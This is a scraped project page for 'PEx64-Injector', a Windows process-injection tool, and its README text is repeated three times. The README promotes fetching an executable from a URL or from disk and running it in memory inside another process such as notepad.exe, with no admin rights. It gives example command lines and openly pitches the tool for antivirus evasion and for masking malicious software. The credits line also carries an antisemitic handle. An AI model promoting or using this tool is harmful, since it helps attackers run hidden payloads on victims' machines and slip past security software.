PEx64-Injector (Process Migrator) + Download Execute In Memory [Updated 23/10/2024]

Inject any x64 exe to any x64 process ~~(Net FrameWork 3.5)~~ Upgraded to : Net FrameWork 4.7.2 Directly from the Internet or Locally, without touching the disk.

No Administrator privileges required.

GIF Demo

How can be used?

Download here.

Usage: Migrator.exe "localfilePath(Lpath)" or "direct URL" "Legitfile(fpath)"

Usage Example: 1. Migrator.exe "C:\Users\User\Desktop\Putty64.exe" "C:\Windows\System32\notepad.exe"

Usage Example: 2. Migrator.exe "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe" "C:\Windows\System32\notepad.exe"

Keep as a note that when you specify the migratefile it will launch as a new process and won't migrate to an already running process.

Such tool can be utilized for AV evasion, masking malicious software under legitimate process.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

PEx64-Injector (Process Migrator) + Download Execute In Memory [Updated 23/10/2024]

Inject any x64 exe to any x64 process (Net FrameWork 3.5) Upgraded to : Net FrameWork 4.7.2 Directly from the Internet or Locally, without touching the disk.

No Administrator privileges required.

GIF Demo

How can be used?

Download here.

Usage: Migrator.exe "localfilePath(Lpath)" or "direct URL" "Legitfile(fpath)"

Usage Example: 1. Migrator.exe "C:\Users\User\Desktop\Putty64.exe" "C:\Windows\System32\notepad.exe"

Usage Example: 2. Migrator.exe "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe" "C:\Windows\System32\notepad.exe"

Keep as a note that when you specify the migratefile it will launch as a new process and won't migrate to an already running process.

Such tool can be utilized for AV evasion, masking malicious software under legitimate process.

Special thanks to GigaJew.

Files

README.md

Latest commit

History

README.md

File metadata and controls

PEx64-Injector (Process Migrator) + Download Execute In Memory [Updated 23/10/2024]

Inject any x64 exe to any x64 process (Net FrameWork 3.5) Upgraded to : Net FrameWork 4.7.2 Directly from the Internet or Locally, without touching the disk.

No Administrator privileges required.

GIF Demo

How can be used?

Download here.

Usage: Migrator.exe "localfilePath(Lpath)" or "direct URL" "Legitfile(fpath)"

Usage Example: 1. Migrator.exe "C:\Users\User\Desktop\Putty64.exe" "C:\Windows\System32\notepad.exe"

Usage Example: 2. Migrator.exe "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe" "C:\Windows\System32\notepad.exe"

Keep as a note that when you specify the migratefile it will launch as a new process and won't migrate to an already running process.

Such tool can be utilized for AV evasion, masking malicious software under legitimate process.

Special thanks to GigaJew.